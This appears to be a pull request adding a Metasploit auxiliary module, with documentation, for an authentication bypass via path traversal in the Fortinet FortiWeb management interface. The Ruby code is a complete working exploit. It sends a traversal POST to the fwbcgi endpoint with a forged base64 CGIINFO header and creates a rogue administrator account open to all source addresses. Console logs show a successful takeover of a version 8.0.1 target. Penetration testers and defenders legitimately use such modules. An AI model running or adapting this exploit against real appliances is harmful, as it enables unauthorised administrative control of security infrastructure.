### PR TITLE
Add an aux module for the recent FortiWeb exploit (No CVE assigned yet)

### DIFF
--- a/documentation/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.md
+++ b/documentation/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+FortiWeb management interface to create a new local administrator user account. This vulnerability
+appears to be patched in the latest version of the product, version 8.0.2.
+
+## Testing
+Download a suitable FortiWeb-VM image and create a new VM. When creating the VM, assign the first network interface to a
+network you can target later (e.g. your external network), optionally, assign the second network interface to a private
+network. Power on the VM, and login to the console with the default username `admin` and a blank password. You will be
+asked to create a new admin password. Once you are at the CLI, you can assign an IP address to the management
+interface (on `port1`) for your (external) network:
+
+```
+FortiWeb # config system interface 
+
+FortiWeb (interface) # edit port1 
+
+FortiWeb (port1) # set ip 192.168.86.200 255.255.255.0
+
+FortiWeb (port1) # end
+
+FortiWeb #
+```
+
+You should now be able to access the management interface via HTTPS, e.g. `https://192.168.86.200/login`.
+
+## Options
+
+### NEW_USERNAME
+Username to use when creating a new admin account (Defaults to a random value).
+
+### NEW_PASSWORD
+Password to use when creating a new admin account (Defaults to a random value).
+
+## Advanced Options
+
+The following advanced options do not need to be changed against a target in a default configuration.
+
+### FORTIWEB_ACCESS_PROFILE
+The access profile to use for the new admin account (Defaults to `prof_admin`).
+
+### FORTIWEB_DOMAIN
+The domain to use for the new admin account (Defaults to `root`).
+
+### FORTIWEB_DEFAULT_ADMIN_ACCOUNT
+The default FortiWeb admin account name (Defaults to `admin`).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/admin/http/fortinet_fortiweb_create_admin`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>` (If different from the default of 443)
+5. `set SSL true` (Or set to false if targeting HTTP)
+
+Configure the new admin account you will create. The module will supply a default random value for these.
+
+6. `set NEW_USERNAME <NEW_ADMIN_NAME>`
+7. `set NEW_PASSWORD <NEW_ADMIN_PASSWORD>`
+
+Run the module:
+
+8. `check`
+9. `run`
+
+Verify you can login using the new admin account you just created:
+
+10. Browse to `https://<TARGET_IP_ADDRESS>:<TARGET_HTTP_OR_HTTPS_PORT>/login` and login using `<NEW_ADMIN_NAME>:<NEW_ADMIN_PASSWORD>`
+
+## Scenarios
+
+### Example 1 (Success against FortiWeb 8.0.1)
+
+```
+msf > use auxiliary/admin/http/fortinet_fortiweb_create_admin 
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.202
+RHOST => 192.168.86.202
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_USERNAME pwn3d
+NEW_USERNAME => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_PASSWORD pwn3d
+NEW_PASSWORD => pwn3d
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.202:443 - The target appears to be vulnerable.
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run
+[*] Running module against 192.168.86.202
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] New admin account successfully created: pwn3d:pwn3d
+[+] Login via https://192.168.86.202:443/login
+[*] Auxiliary module execution completed
+```
+
+### Example 2 (Failure against FortiWeb 8.0.2)
+
+```
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.200
+RHOST => 192.168.86.200
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
+[*] 192.168.86.200:443 - The target is not exploitable. Received a 403 Forbidden response
+msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run autocheck=false
+[*] Running module against 192.168.86.200
+[!] AutoCheck is disabled, proceeding with exploitation
+[-] Auxiliary aborted due to failure: not-vulnerable: Target does not appear vulnerable (403 Forbidden response)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
+++ b/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
@@ -1,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Fortinet FortiWeb create new local admin',
+        'Description' => %q{
+          This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet
+          FortiWeb management interface to create a new local administrator user account. This vulnerability
+          appears to be patched in the latest version of the product, version 8.0.2.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Defused', # PoC from honeypot
+          'sfewer-r7', # MSF module
+        ],
+        'References' => [
+          # ['C V E', '2025-??'], # No known CVE assigned yet (as of Nov 14, 2025)
+          ['URL', 'https://x.com/defusedcyber/status/1975242250373517373'], # Original PoC posted online
+          ['URL', 'https://github.com/watchtowrlabs/watchTowr-vs-Fortiweb-AuthBypass'], # PoC
+          ['URL', 'https://www.pwndefend.com/2025/11/13/suspected-fortinet-zero-day-exploited-in-the-wild/'],
+          ['URL', 'https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/']
+        ],
+        # 'D i s c l o s u r e D a t e' => '2025-??-??', # Not yet disclosed by the vendor (as of Nov 14, 2025)
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to use when creating a new admin account', Faker::Internet.username]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to use when creating a new admin account', Rex::Text.rand_text_alpha(8)])
+    ])
+
+    register_advanced_options(
+      [
+        OptString.new('FORTIWEB_ACCESS_PROFILE', [ true, 'The access profile to use for the new admin account', 'prof_admin' ]),
+        OptString.new('FORTIWEB_DOMAIN', [ true, 'The domain to use for the new admin account', 'root' ]),
+        OptString.new('FORTIWEB_DEFAULT_ADMIN_ACCOUNT', [ true, 'The default FortiWeb admin account name', 'admin' ])
+      ]
+    )
+  end
+
+  def check
+    res = post_auth_bypass_request({ data: {} })
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return Exploit::CheckCode::Safe('Received a 403 Forbidden response') if res.code == 403
+
+    Exploit::CheckCode::Appears
+  end
+
+  def run
+    request_data = {
+      data: {
+        'q_type' => 1,
+        'name' => datastore['NEW_USERNAME'],
+        'access-profile' => datastore['FORTIWEB_ACCESS_PROFILE'],
+        'access-profile_val' => '0',
+        'trusthostv4' => '0.0.0.0/0',
+        'trusthostv6' => '::/0',
+        'last-name' => '',
+        'first-name' => '',
+        'email-address' => '',
+        'phone-number' => '',
+        'mobile-number' => '',
+        'hidden' => 0,
+        'domains' => datastore['FORTIWEB_DOMAIN'],
+        'sz_dashboard' => -1,
+        'type' => 'local-user',
+        'type_val' => '0',
+        'admin-usergrp_val' => '0',
+        'wildcard_val' => '0',
+        'accprofile-override_val' => '0',
+        'sshkey' => '',
+        'passwd-set-time' => 0,
+        'history-password-pos' => 0,
+        'history-password0' => '',
+        'history-password1' => '',
+        'history-password2' => '',
+        'history-password3' => '',
+        'history-password4' => '',
+        'history-password5' => '',
+        'history-password6' => '',
+        'history-password7' => '',
+        'history-password8' => '',
+        'history-password9' => '',
+        'force-password-change' => 'disable',
+        'force-password-change_val' => '0',
+        'password' => datastore['NEW_PASSWORD']
+      }
+    }
+
+    res = post_auth_bypass_request(request_data)
+
+    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed.') unless res
+
+    return fail_with(Msf::Exploit::Failure::NotVulnerable, 'Target does not appear vulnerable (403 Forbidden response)') if res.code == 403
+
+    unless res.code == 200
+      if res.headers['Content-Type'] == 'application/json'
+        begin
+          response_data = JSON.parse(res.body)
+          print_bad(response_data.to_s)
+        rescue JSON::ParserError
+          print_bad('failed to parse response JSON data')
+        end
+      end
+      return fail_with(Msf::Exploit::Failure::UnexpectedReply, "Target returned an unexpected response (#{res.code})")
+    end
+
+    print_good("New admin account successfully created: #{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+
+    print_good("Login via #{ssl ? 'https' : 'http'}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, 'login')}")
+
+    store_credentials(datastore['NEW_USERNAME'], datastore['NEW_PASSWORD'], Metasploit::Model::Login::Status::UNTRIED)
+  end
+
+  def post_auth_bypass_request(request_data)
+    cgi_info = {
+      'username' => datastore['FORTIWEB_DEFAULT_ADMIN_ACCOUNT'],
+      'profname' => datastore['FORTIWEB_ACCESS_PROFILE'],
+      'vdom' => datastore['FORTIWEB_DOMAIN'],
+      'loginname' => datastore['FORTIWEB_DEFAULT_ADMIN_ACCOUNT']
+    }
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi'),
+      'headers' => {
+        'CGIINFO' => Base64.strict_encode64(cgi_info.to_json)
+      },
+      'ctype' => 'application/json',
+      'data' => request_data.to_json
+    )
+  end
+
+  def store_credentials(username, password, login_status)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: ssl ? 'https' : 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: login_status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end


### PR DESCRIPTION
## Overview
This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create a new local administrator user account. This vulnerability appears to be patched in the latest version of the product, version `8.0.2`.

This aux module is based upon [the PoC](https://x.com/defusedcyber/status/1975242250373517373) published by Defused.


### Example 1 (Success against FortiWeb 8.0.1)

```console
msf > use auxiliary/admin/http/fortinet_fortiweb_create_admin 
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.202
RHOST => 192.168.86.202
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_USERNAME pwn3d
NEW_USERNAME => pwn3d
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set NEW_PASSWORD pwn3d
NEW_PASSWORD => pwn3d
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
[*] 192.168.86.202:443 - The target appears to be vulnerable.
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run
[*] Running module against 192.168.86.202
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] New admin account successfully created: pwn3d:pwn3d
[+] Login via https://192.168.86.202:443/login
[*] Auxiliary module execution completed
```

### Example 2 (Failure against FortiWeb 8.0.2)

```console
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > set RHOST 192.168.86.200
RHOST => 192.168.86.200
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
[*] 192.168.86.200:443 - The target is not exploitable. Received a 403 Forbidden response
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > run autocheck=false
[*] Running module against 192.168.86.200
[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: not-vulnerable: Target does not appear vulnerable (403 Forbidden response)
[*] Auxiliary module execution completed
```